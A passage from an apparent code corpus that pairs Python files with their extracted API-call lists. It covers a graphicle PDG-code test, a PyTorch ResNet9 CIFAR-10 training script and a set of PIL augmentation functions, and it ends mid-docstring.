tensorflow as tf\n'), ((4117, 4180), 
'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv1_2', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool1"""'}), "(conv1_2, _ksize, _strides, 'SAME', name='pool1')\n", (4131, 4180), True, 'import tensorflow as tf\n'), ((4400, 4463), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv2_2', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool2"""'}), "(conv2_2, _ksize, _strides, 'SAME', name='pool2')\n", (4414, 4463), True, 'import tensorflow as tf\n'), ((4772, 4835), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv3_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool3"""'}), "(conv3_3, _ksize, _strides, 'SAME', name='pool3')\n", (4786, 4835), True, 'import tensorflow as tf\n'), ((5144, 5207), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv4_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool4"""'}), "(conv4_3, _ksize, _strides, 'SAME', name='pool4')\n", (5158, 5207), True, 'import tensorflow as tf\n'), ((5516, 5579), 'tensorflow.nn.max_pool', 'tf.nn.max_pool', (['conv5_3', '_ksize', '_strides', '"""SAME"""'], {'name': '"""pool5"""'}), "(conv5_3, _ksize, _strides, 'SAME', name='pool5')\n", (5530, 5579), True, 'import tensorflow as tf\n'), ((5706, 5736), 'tensorflow.reshape', 'tf.reshape', (['pool5', '[-1, shape]'], {}), '(pool5, [-1, shape])\n', (5716, 5736), True, 'import tensorflow as tf\n'), ((6522, 6557), 'scipy.misc.imread', 'imread', (['"""testflash.jpg"""'], {'mode': '"""RGB"""'}), "('testflash.jpg', mode='RGB')\n", (6528, 6557), False, 'from scipy.misc import imread, imresize\n'), ((6609, 6644), 'os.path.isfile', 'os.path.isfile', (['"""vgg16_weights.npz"""'], {}), "('vgg16_weights.npz')\n", (6623, 6644), False, 'import os\n'), ((7013, 7036), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (7034, 7036), True, 'import tensorflow as tf\n'), ((7062, 7074), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (7072, 7074), True, 'import tensorflow as tf\n'), ((2057, 2086), 'tensorflow.matmul', 
'tf.matmul', (['in_tensor', 'weights'], {}), '(in_tensor, weights)\n', (2066, 2086), True, 'import tensorflow as tf\n'), ((2347, 2363), 'numpy.load', 'np.load', (['weights'], {}), '(weights)\n', (2354, 2363), True, 'import numpy as np\n'), ((3662, 3699), 'tensorflow.name_scope', 'tf.name_scope', (['"""preprocess_centering"""'], {}), "('preprocess_centering')\n", (3675, 3699), True, 'import tensorflow as tf\n'), ((3720, 3819), 'tensorflow.constant', 'tf.constant', (['[123.68, 116.779, 103.939]'], {'dtype': 'tf.float32', 'shape': '[1, 1, 1, 3]', 'name': '"""img_mean"""'}), "([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3\n ], name='img_mean')\n", (3731, 3819), True, 'import tensorflow as tf\n'), ((7298, 7304), 'time.time', 'time', ([], {}), '()\n', (7302, 7304), False, 'from time import time\n'), ((7405, 7436), 'numpy.argsort', 'np.argsort', (['class_probabilities'], {}), '(class_probabilities)\n', (7415, 7436), True, 'import numpy as np\n'), ((7507, 7538), 'numpy.argsort', 'np.argsort', (['class_probabilities'], {}), '(class_probabilities)\n', (7517, 7538), True, 'import numpy as np\n'), ((2873, 2897), 'scipy.misc.imresize', 'imresize', (['im', '(224, 224)'], {}), '(im, (224, 224))\n', (2881, 2897), False, 'from scipy.misc import imread, imresize\n'), ((3243, 3267), 'scipy.misc.imresize', 'imresize', (['im', '(224, 224)'], {}), '(im, (224, 224))\n', (3251, 3267), False, 'from scipy.misc import imread, imresize\n')] |
import numpy as np
import typicle
import graphicle
types_ = typicle.Types()


def test_pdgs():
    """PDG codes 1..6 map onto the six quark names in order."""
    codes = np.arange(1, 7, dtype=types_.int)
    pdgs = graphicle.PdgArray(codes)
    expected = ["d", "u", "s", "c", "b", "t"]
    assert list(pdgs.name) == expected
| [
"graphicle.PdgArray",
"numpy.arange",
"typicle.Types"
] | [((63, 78), 'typicle.Types', 'typicle.Types', ([], {}), '()\n', (76, 78), False, 'import typicle\n'), ((113, 146), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {'dtype': 'types_.int'}), '(1, 7, dtype=types_.int)\n', (122, 146), True, 'import numpy as np\n'), ((158, 186), 'graphicle.PdgArray', 'graphicle.PdgArray', (['pdg_vals'], {}), '(pdg_vals)\n', (176, 186), False, 'import graphicle\n')] |
import argparse
import numpy as np
import torch
import torch.nn as nn
from collections import namedtuple, OrderedDict
import torchvision as tv
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
from torch import optim
from functools import partial
import copy
from SGD import SGD
from core import (
normalise,
transpose,
pad,
preprocess,
PiecewiseLinear,
map_nested,
Timer,
group_by_key,
Table,
union,
Crop,
FlipLR,
flip_lr
)
from torch_backend import (
cifar10,
cifar10_mean,
cifar10_std,
cifar10_classes,
cov,
patches,
eigens,
to,
trainable_params,
Flatten,
Mul,
GhostBatchNorm,
GPUBatches,
)
# Command-line options: where the data lives and where logs go.
parser = argparse.ArgumentParser()
for flag, default in (('--data_dir', './data'), ('--log_dir', '.')):
    parser.add_argument(flag, type=str, default=default)

# Global batch-step counter shared with train(); cudnn autotuner is safe
# here because input shapes are fixed.
STEP = 0
torch.backends.cudnn.benchmark = True
class ConvBN(nn.Module):
    """3x3 conv (stride 1, pad 1, no bias) -> optional pool -> ghost BN -> CELU."""
    def __init__(self, c_in, c_out, pool=None):
        super().__init__()
        self.conv = nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)
        self.pool = pool
        self.bn = GhostBatchNorm(c_out, num_splits=16, weight_freeze=True)
        self.relu = nn.CELU(alpha=0.3)

    def forward(self, x):
        # Pooling (when configured) happens before normalisation.
        out = self.conv(x)
        if self.pool is not None:
            out = self.pool(out)
        return self.relu(self.bn(out))
class WhiteningFilter(nn.Module):
    """Fixed (non-trainable) 3x3 whitening convolution.

    The kernel is built from an eigendecomposition of patch statistics:
    each eigenvector V[i] is scaled by 1/sqrt(Λ[i] + eps).
    """
    def __init__(self, Λ, V, eps=1e-2):
        super().__init__()
        conv = nn.Conv2d(3, 27, kernel_size=(3, 3), padding=(1, 1), bias=False)
        scale = torch.sqrt(Λ + eps)[:, None, None, None]
        conv.weight.data = V / scale
        conv.weight.requires_grad = False  # frozen: this layer is never trained
        self.filt = conv

    def forward(self, x):
        return self.filt(x)
class WhiteningBlock(nn.Module):
    """Frozen whitening filter followed by a learned 1x1 conv, ghost BN and CELU."""
    def __init__(self, c_in, c_out, Λ=None, V=None, eps=1e-2):
        super().__init__()
        self.whitening = WhiteningFilter(Λ, V, eps)
        stages = [
            ('conv', nn.Conv2d(27, c_out, kernel_size=(1, 1), bias=False)),
            ('bn', GhostBatchNorm(c_out, num_splits=16, weight_freeze=True)),
            ('relu', nn.CELU(alpha=0.3)),
        ]
        self.layers = nn.Sequential(OrderedDict(stages))

    def forward(self, x):
        return self.layers(self.whitening(x))
class Residual(nn.Module):
    """Identity shortcut around two ConvBN blocks: returns x + conv2(conv1(x))."""
    def __init__(self, c):
        super().__init__()
        self.conv1 = ConvBN(c, c)
        self.conv2 = ConvBN(c, c)

    def forward(self, x):
        shortcut = x
        out = self.conv1(x)
        out = self.conv2(out)
        return shortcut + out
class ResNet9(nn.Module):
    """Small CIFAR network (cifar10-fast style): whitening stem, three pooled
    ConvBN stages (with residual blocks on stages 2 and 4), global max-pool,
    bias-free linear classifier, and a constant output scale `weight`."""
    def __init__(self, weight, Λ, V):
        super().__init__()
        widths = [64, 128, 256, 512]
        use_residual = [False, True, False, True]
        pool = nn.MaxPool2d(2)
        blocks = [WhiteningBlock(3, widths[0], Λ, V)]
        for prev, cur, res in zip(widths, widths[1:], use_residual[1:]):
            blocks.append(ConvBN(prev, cur, pool=pool))
            if res:
                blocks.append(Residual(cur))
        blocks += [
            nn.MaxPool2d(4),
            Flatten(),
            nn.Linear(widths[-1], 10, bias=False),
            Mul(weight),
        ]
        self.layers = nn.ModuleList(blocks)

    def forward(self, x):
        out = x
        for layer in self.layers:
            out = layer(out)
        return out

    def half(self):
        # Convert to fp16 but keep batch-norm parameters in fp32 (their names
        # contain "bn") for numerical stability.
        for name, param in self.named_parameters():
            if "bn" not in name:
                param.data = param.data.half()
        return self
class LabelSmoothingLoss:
    """Label-smoothed cross entropy; returns the *sum* over the batch."""
    def __init__(self, alpha):
        self.alpha = alpha

    def __call__(self, logits, targets):
        log_probs = F.log_softmax(logits, -1, _stacklevel=5)
        nll = F.nll_loss(log_probs, targets, reduction='none')
        # Smoothing term: negative mean log-probability over all classes.
        uniform_term = -log_probs.mean(dim=-1)
        per_sample = (1 - self.alpha) * nll + self.alpha * uniform_term
        return per_sample.sum()
class Transform(Dataset):
    """Wrap a {'data', 'targets'} dict as a torch Dataset with an optional
    per-item transform applied to the data element only."""
    def __init__(self, dataset, device, transforms=None):
        super().__init__()
        self.data = dataset["data"]
        self.targets = dataset["targets"]
        self.transforms = transforms
        self.device = device  # stored but not used here; kept for callers

    def __len__(self):
        return len(self.data)

    def __getitem__(self, index):
        item = self.data[index]
        label = self.targets[index]
        if self.transforms:
            item = self.transforms(item)
        return item, label
def update_ema(momentum, update_freq=1):
    """Return a callback maintaining an exponential moving average of a model.

    The returned ``step(step, model, ema_model)`` fires only every
    ``update_freq`` steps and updates every floating-point entry of
    ``ema_model``'s state dict in place:
    ``ema <- rho * ema + (1 - rho) * v`` with ``rho = momentum ** update_freq``.

    Args:
        momentum: per-step EMA momentum in [0, 1).
        update_freq: apply the update every this many steps.
    """
    rho = momentum ** update_freq

    def step(step, model, ema_model):
        if (step % update_freq) != 0:
            return
        for v, ema_v in zip(model.state_dict().values(), ema_model.state_dict().values()):
            if not v.dtype.is_floating_point:
                continue  # skip integer buffers such as num_batches_tracked
            # In-place so the EMA model's tensors keep their identity.
            ema_v *= rho
            ema_v += (1 - rho) * v

    return step
def zero_grad(model):
    """Detach gradients entirely (grad=None is cheaper than zeroing in place)."""
    for p in model.parameters():
        p.grad = None
def train(device, model, ema_model, train_batches, opts, lr_schedulers, loss_func):
    """Run one epoch and return {'loss': mean per-sample loss, 'acc': accuracy}.

    Side effects: advances the module-global STEP once per batch, sets each
    optimizer's learning rate from its paired scheduler, and refreshes
    ema_model via an EMA callback (momentum 0.99 applied every 5 steps).
    """
    ema_func = update_ema(0.99, 5)
    # Running sums; 'n' counts samples and is deleted before returning.
    train_meter = {
        "loss": 0,
        "acc": 0,
        "n": 0
    }
    model.train()
    ema_model.train()
    global STEP
    for batch in train_batches:
        # Refresh every optimizer's lr for this step before the update.
        for opt, scheduler in zip(opts, lr_schedulers):
            lr = scheduler(STEP)
            for param_group in opt.param_groups:
                param_group['lr'] = lr
        inputs, targets = batch
        inputs, targets = inputs.to(device), targets.to(device)
        # inputs, targets = batch["input"], batch["target"]
        logits = model(inputs)
        loss = loss_func(logits, targets)
        loss.backward()
        for opt in opts:
            opt.step()
        # opt.zero_grad()
        # Gradients are dropped (set to None) rather than zeroed in place.
        zero_grad(model)
        train_meter["loss"] += loss.item()
        train_meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
        train_meter["n"] += inputs.shape[0]
        ema_func(STEP, model, ema_model)
        STEP += 1
    # Normalise accumulated sums by the number of samples seen.
    train_meter["loss"] = train_meter["loss"] / train_meter["n"]
    train_meter["acc"] = train_meter["acc"] / train_meter["n"]
    del train_meter["n"]
    return train_meter
def warmup_cudnn(loss_func, batch_sizes, device):
    """Run one forward/backward pass at each batch size so the cudnn.benchmark
    autotuner selects kernels before timing starts.

    NOTE(review): random_batch moves tensors with .cuda(), so this assumes a
    CUDA device regardless of the `device` argument — confirm before running
    on CPU.
    """
    random_batch = lambda batch_size: {
        'input': torch.Tensor(np.random.rand(batch_size,3,32,32)).cuda().half(),
        'target': torch.LongTensor(np.random.randint(0,10,batch_size)).cuda()
    }
    # Random fp16 data stands in for real images when building the model's
    # whitening filter from patch eigendecomposition.
    random_data = torch.tensor(np.random.randn(1000,3,32,32).astype(np.float16), device=device)
    Λ, V = eigens(patches(random_data))
    model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
    for size in batch_sizes:
        batch = random_batch(size)
        inputs, targets = batch["input"], batch["target"]
        logits = model(inputs)
        loss = loss_func(logits, targets)
        zero_grad(model)
        loss.backward()
        torch.cuda.synchronize()
@torch.no_grad()
def test(device, model, ema_model, test_batches, loss_func, tta=None):
meter = {
"loss": 0,
"acc": 0,
"n": 0
}
model.eval()
ema_model.eval()
for batch in test_batches:
inputs, targets = batch
inputs, targets = inputs.to(device), targets.to(device)
# inputs, targets = batch["input"], batch["target"]
if tta:
logits = torch.mean(torch.stack([ema_model(t(inputs)) for t in tta], dim=0), dim=0)
else:
logits = ema_model(inputs)
loss = loss_func(logits, targets)
meter["loss"] += loss.item()
meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
meter["n"] += inputs.shape[0]
meter["loss"] = meter["loss"] / meter["n"]
meter["acc"] = meter["acc"] / meter["n"]
del meter["n"]
return meter
if __name__ == "__main__":
    # End-to-end CIFAR-10 training: load data, warm up cudnn, preprocess,
    # build the whitened ResNet9, then train with per-epoch EMA evaluation.
    device = "cuda"
    args = parser.parse_args()
    print('Downloading datasets')
    dataset = map_nested(torch.tensor, cifar10(args.data_dir))
    # 10 epochs total; the EMA model settles over the last 2.
    epochs, ema_epochs = 10, 2
    lr_schedule = PiecewiseLinear([0, epochs/5, epochs-ema_epochs], [0, 1.0, 0.1])
    batch_size = 512
    train_transforms = tv.transforms.Compose([
        # tv.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),
        tv.transforms.RandomCrop(32, padding=0, padding_mode='reflect'),
        tv.transforms.RandomHorizontalFlip(p=0.5)
    ])
    # train_transforms = [Crop(32, 32), FlipLR()]
    loss_func = LabelSmoothingLoss(0.2)
    print('Warming up torch')
    warmup_cudnn(
        loss_func,
        [batch_size, len(dataset['valid']['targets']) % batch_size], # normal batch size and val last batch size
        device
    )
    print('Starting timer')
    timer = Timer(synch=torch.cuda.synchronize)
    print('Preprocessing training data')
    # dataset = map_nested(to(device), dataset)
    # T = lambda x: torch.tensor(x, dtype=torch.float16, device=device)
    T = lambda x: torch.tensor(x, dtype=torch.float32)
    transforms = [
        partial(normalise, mean=T(cifar10_mean), std=T(cifar10_std)),
        partial(transpose, source='NHWC', target='NCHW'),
    ]
    train_set = preprocess(dataset['train'], transforms + [partial(pad, border=4), to(dtype=torch.float16)])
    # Whitening statistics come from a 10k-image sample of the training set.
    Λ, V = eigens(patches(train_set['data'][:10000,:,4:-4,4:-4])) #center crop to remove padding
    model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
    print(f'Finished in {timer():.2} seconds')
    print('Preprocessing test data')
    test_set = preprocess(dataset['valid'], transforms + [to(dtype=torch.float16)])
    print(f'Finished in {timer():.2} seconds')
    train_batches = DataLoader(Transform(train_set, device, train_transforms), batch_size, num_workers=4, shuffle=True, drop_last=True)
    test_batches = DataLoader(Transform(test_set, device, None), batch_size, num_workers=4, shuffle=False, drop_last=False)
    # train_batches = GPUBatches(batch_size=batch_size, transforms=train_transforms, dataset=train_set, shuffle=True, drop_last=True, max_options=200)
    # test_batches = GPUBatches(batch_size=batch_size, dataset=test_set, shuffle=False, drop_last=False)
    # Bias parameters get their own optimizer with rescaled lr / weight decay.
    is_bias = group_by_key(('bias' in k, v) for k, v in trainable_params(model).items())
    schedules = [
        lambda step: lr_schedule((step+1)/len(train_batches))/batch_size,
        lambda step: lr_schedule((step+1)/len(train_batches))*(64/batch_size)
    ]
    opts = [
        optim.SGD(is_bias[False], lr=schedules[0](0), weight_decay=5e-4*batch_size, momentum=0.9, nesterov=True),
        optim.SGD(is_bias[True], lr=schedules[1](0), weight_decay=5e-4*batch_size/64, momentum=0.9, nesterov=True)
    ]
    logs = Table()
    ema_model = copy.deepcopy(model)
    for epoch in range(1, epochs+1):
        train_summary = train(device, model, ema_model, train_batches, opts, schedules, loss_func)
        train_time = timer()
        # Evaluation uses test-time augmentation: identity + horizontal flip.
        test_summary = test(device, model, ema_model, test_batches, loss_func, [lambda x: x, flip_lr])
        test_time = timer(include_in_total=False)
        log = {
            "train": union({"time": train_time}, train_summary),
            "test": union({"time": test_time}, test_summary),
            "total time": timer.total_time
        }
        logs.append(union({"epoch": epoch}, log))
| [
"torch.cuda.synchronize",
"argparse.ArgumentParser",
"torch.sqrt",
"core.Table",
"torch.nn.CELU",
"numpy.random.randint",
"torch.no_grad",
"core.PiecewiseLinear",
"torch_backend.Mul",
"core.union",
"numpy.random.randn",
"torch_backend.trainable_params",
"torch.nn.functional.nll_loss",
"tor... | [((754, 779), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (777, 779), False, 'import argparse\n'), ((7683, 7698), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7696, 7698), False, 'import torch\n'), ((8789, 8857), 'core.PiecewiseLinear', 'PiecewiseLinear', (['[0, epochs / 5, epochs - ema_epochs]', '[0, 1.0, 0.1]'], {}), '([0, epochs / 5, epochs - ema_epochs], [0, 1.0, 0.1])\n', (8804, 8857), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((9463, 9498), 'core.Timer', 'Timer', ([], {'synch': 'torch.cuda.synchronize'}), '(synch=torch.cuda.synchronize)\n', (9468, 9498), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11411, 11418), 'core.Table', 'Table', ([], {}), '()\n', (11416, 11418), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11436, 11456), 'copy.deepcopy', 'copy.deepcopy', (['model'], {}), '(model)\n', (11449, 11456), False, 'import copy\n'), ((1068, 1138), 'torch.nn.Conv2d', 'nn.Conv2d', (['c_in', 'c_out'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)\n', (1077, 1138), True, 'import torch.nn as nn\n'), ((1182, 1238), 'torch_backend.GhostBatchNorm', 'GhostBatchNorm', (['c_out'], {'num_splits': '(16)', 'weight_freeze': '(True)'}), '(c_out, num_splits=16, weight_freeze=True)\n', (1196, 1238), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((1259, 1277), 'torch.nn.CELU', 'nn.CELU', ([], {'alpha': '(0.3)'}), '(alpha=0.3)\n', (1266, 1277), True, 'import torch.nn as nn\n'), 
((1593, 1657), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(27)'], {'kernel_size': '(3, 3)', 'padding': '(1, 1)', 'bias': '(False)'}), '(3, 27, kernel_size=(3, 3), padding=(1, 1), bias=False)\n', (1602, 1657), True, 'import torch.nn as nn\n'), ((2934, 2949), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (2946, 2949), True, 'import torch.nn as nn\n'), ((3420, 3446), 'torch.nn.ModuleList', 'nn.ModuleList', (['self.layers'], {}), '(self.layers)\n', (3433, 3446), True, 'import torch.nn as nn\n'), ((3876, 3916), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {'_stacklevel': '(5)'}), '(logits, -1, _stacklevel=5)\n', (3889, 3916), True, 'import torch.nn.functional as F\n'), ((3942, 3990), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['log_probs', 'targets'], {'reduction': '"""none"""'}), "(log_probs, targets, reduction='none')\n", (3952, 3990), True, 'import torch.nn.functional as F\n'), ((7308, 7328), 'torch_backend.patches', 'patches', (['random_data'], {}), '(random_data)\n', (7315, 7328), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7656, 7680), 'torch.cuda.synchronize', 'torch.cuda.synchronize', ([], {}), '()\n', (7678, 7680), False, 'import torch\n'), ((8715, 8737), 'torch_backend.cifar10', 'cifar10', (['args.data_dir'], {}), '(args.data_dir)\n', (8722, 8737), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((9683, 9719), 'torch.tensor', 'torch.tensor', (['x'], {'dtype': 'torch.float32'}), '(x, dtype=torch.float32)\n', (9695, 9719), False, 'import torch\n'), ((9817, 9865), 'functools.partial', 'partial', (['transpose'], {'source': '"""NHWC"""', 'target': '"""NCHW"""'}), "(transpose, source='NHWC', target='NCHW')\n", (9824, 9865), False, 'from functools import 
partial\n'), ((10003, 10052), 'torch_backend.patches', 'patches', (["train_set['data'][:10000, :, 4:-4, 4:-4]"], {}), "(train_set['data'][:10000, :, 4:-4, 4:-4])\n", (10010, 10052), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((9005, 9068), 'torchvision.transforms.RandomCrop', 'tv.transforms.RandomCrop', (['(32)'], {'padding': '(0)', 'padding_mode': '"""reflect"""'}), "(32, padding=0, padding_mode='reflect')\n", (9029, 9068), True, 'import torchvision as tv\n'), ((9078, 9119), 'torchvision.transforms.RandomHorizontalFlip', 'tv.transforms.RandomHorizontalFlip', ([], {'p': '(0.5)'}), '(p=0.5)\n', (9112, 9119), True, 'import torchvision as tv\n'), ((11814, 11856), 'core.union', 'union', (["{'time': train_time}", 'train_summary'], {}), "({'time': train_time}, train_summary)\n", (11819, 11856), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11879, 11919), 'core.union', 'union', (["{'time': test_time}", 'test_summary'], {}), "({'time': test_time}, test_summary)\n", (11884, 11919), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((11996, 12024), 'core.union', 'union', (["{'epoch': epoch}", 'log'], {}), "({'epoch': epoch}, log)\n", (12001, 12024), False, 'from core import normalise, transpose, pad, preprocess, PiecewiseLinear, map_nested, Timer, group_by_key, Table, union, Crop, FlipLR, flip_lr\n'), ((1686, 1705), 'torch.sqrt', 'torch.sqrt', (['(Λ + eps)'], {}), '(Λ + eps)\n', (1696, 1705), False, 'import torch\n'), ((3269, 3284), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(4)'], {}), '(4)\n', (3281, 3284), True, 'import torch.nn as nn\n'), ((3298, 3307), 'torch_backend.Flatten', 'Flatten', ([], {}), '()\n', (3305, 3307), False, 
'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((3321, 3360), 'torch.nn.Linear', 'nn.Linear', (['channels[-1]', '(10)'], {'bias': '(False)'}), '(channels[-1], 10, bias=False)\n', (3330, 3360), True, 'import torch.nn as nn\n'), ((3374, 3385), 'torch_backend.Mul', 'Mul', (['weight'], {}), '(weight)\n', (3377, 3385), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7224, 7256), 'numpy.random.randn', 'np.random.randn', (['(1000)', '(3)', '(32)', '(32)'], {}), '(1000, 3, 32, 32)\n', (7239, 7256), True, 'import numpy as np\n'), ((9933, 9955), 'functools.partial', 'partial', (['pad'], {'border': '(4)'}), '(pad, border=4)\n', (9940, 9955), False, 'from functools import partial\n'), ((9957, 9980), 'torch_backend.to', 'to', ([], {'dtype': 'torch.float16'}), '(dtype=torch.float16)\n', (9959, 9980), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((10287, 10310), 'torch_backend.to', 'to', ([], {'dtype': 'torch.float16'}), '(dtype=torch.float16)\n', (10289, 10310), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((2104, 2156), 'torch.nn.Conv2d', 'nn.Conv2d', (['(27)', 'c_out'], {'kernel_size': '(1, 1)', 'bias': '(False)'}), '(27, c_out, kernel_size=(1, 1), bias=False)\n', (2113, 2156), True, 'import torch.nn as nn\n'), ((2178, 2234), 'torch_backend.GhostBatchNorm', 'GhostBatchNorm', (['c_out'], {'num_splits': '(16)', 'weight_freeze': '(True)'}), '(c_out, num_splits=16, weight_freeze=True)\n', (2192, 2234), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, 
cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((2258, 2276), 'torch.nn.CELU', 'nn.CELU', ([], {'alpha': '(0.3)'}), '(alpha=0.3)\n', (2265, 2276), True, 'import torch.nn as nn\n'), ((7143, 7179), 'numpy.random.randint', 'np.random.randint', (['(0)', '(10)', 'batch_size'], {}), '(0, 10, batch_size)\n', (7160, 7179), True, 'import numpy as np\n'), ((10936, 10959), 'torch_backend.trainable_params', 'trainable_params', (['model'], {}), '(model)\n', (10952, 10959), False, 'from torch_backend import cifar10, cifar10_mean, cifar10_std, cifar10_classes, cov, patches, eigens, to, trainable_params, Flatten, Mul, GhostBatchNorm, GPUBatches\n'), ((7056, 7093), 'numpy.random.rand', 'np.random.rand', (['batch_size', '(3)', '(32)', '(32)'], {}), '(batch_size, 3, 32, 32)\n', (7070, 7093), True, 'import numpy as np\n')] |
import random
import torch
import torch.nn.functional as F
import numpy as np
from PIL import ImageOps, ImageEnhance, ImageFilter, Image
"""
For PIL.Image
"""
def autocontrast(x, *args, **kwargs):
    """Maximise image contrast; round-trips through RGB since ImageOps needs it."""
    rgb = x.convert("RGB")
    return ImageOps.autocontrast(rgb).convert("RGBA")
def brightness(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
    """Scale brightness; level maps linearly to a factor in [0.1, max_level + 0.1]."""
    factor = level / magnitude * max_level + 0.1
    return ImageEnhance.Brightness(x).enhance(factor)
def color(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
    """Adjust colour saturation; level maps linearly to [0.1, max_level + 0.1]."""
    factor = level / magnitude * max_level + 0.1
    return ImageEnhance.Color(x).enhance(factor)
def contrast(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
    """Adjust contrast; level maps linearly to [0.1, max_level + 0.1]."""
    factor = level / magnitude * max_level + 0.1
    return ImageEnhance.Contrast(x).enhance(factor)
def equalize(x, *args, **kwargs):
    """Histogram-equalize the image; ImageOps works on RGB, so round-trip."""
    rgb = x.convert("RGB")
    return ImageOps.equalize(rgb).convert("RGBA")
def identity(x, *args, **kwargs):
    """No-op augmentation: returns the input unchanged."""
    return x
def invert(x, *args, **kwargs):
    """Invert all pixel values (negative image); RGB round-trip for ImageOps."""
    rgb = x.convert("RGB")
    return ImageOps.invert(rgb).convert("RGBA")
def posterize(x, level, magnitude=10, max_level=4, *args, **kwargs):
    """Reduce colour depth; higher level keeps fewer bits (4 - scaled level)."""
    bits = 4 - int(level / magnitude * max_level)
    return ImageOps.posterize(x.convert("RGB"), bits).convert("RGBA")
def rotate(x, level, magnitude=10, max_level=30, *args, **kwargs):
    """Rotate by up to max_level degrees, direction chosen at random."""
    degree = int(level / magnitude * max_level)
    sign = -1 if random.random() > 0.5 else 1
    return x.rotate(sign * degree)
def sharpness(x, level, magnitude=10, max_level=1.8, *args, **kwargs):
    """Adjust sharpness; level maps linearly to [0.1, max_level + 0.1]."""
    factor = level / magnitude * max_level + 0.1
    return ImageEnhance.Sharpness(x).enhance(factor)
def shear_x(x, level, magnitude=10, max_level=0.3, *args, **kwargs):
    """Shear horizontally by a random-signed factor up to max_level."""
    shear = level / magnitude * max_level
    if random.random() > 0.5:
        shear = -shear
    return x.transform(x.size, Image.AFFINE, (1, shear, 0, 0, 1, 0))
def shear_y(x, level, magnitude=10, max_level=0.3, *args, **kwargs):
    """Shear vertically by a random-signed factor up to max_level."""
    shear = level / magnitude * max_level
    if random.random() > 0.5:
        shear = -shear
    return x.transform(x.size, Image.AFFINE, (1, 0, 0, shear, 1, 0))
def solarize(x, level, magnitude=10, max_level=256, *args, **kwargs):
    """Invert pixels above a threshold that decreases as level grows."""
    threshold = 256 - int(level / magnitude * max_level)
    return ImageOps.solarize(x.convert("RGB"), threshold).convert("RGBA")
def translate_x(x, level, magnitude=10, max_level=10, *args, **kwargs):
    """Translate horizontally by up to max_level pixels, random sign."""
    shift = int(level / magnitude * max_level)
    if random.random() > 0.5:
        shift = -shift
    return x.transform(x.size, Image.AFFINE, (1, 0, shift, 0, 1, 0))
def translate_y(x, level, magnitude=10, max_level=10, *args, **kwargs):
    """Translate vertically by up to max_level pixels, random sign."""
    shift = int(level / magnitude * max_level)
    if random.random() > 0.5:
        shift = -shift
    return x.transform(x.size, Image.AFFINE, (1, 0, 0, 0, 1, shift))
def cutout(x, level, magnitude=10, max_level=20, *args, **kwargs):
    """Grey out a randomly placed square patch whose side scales with level.

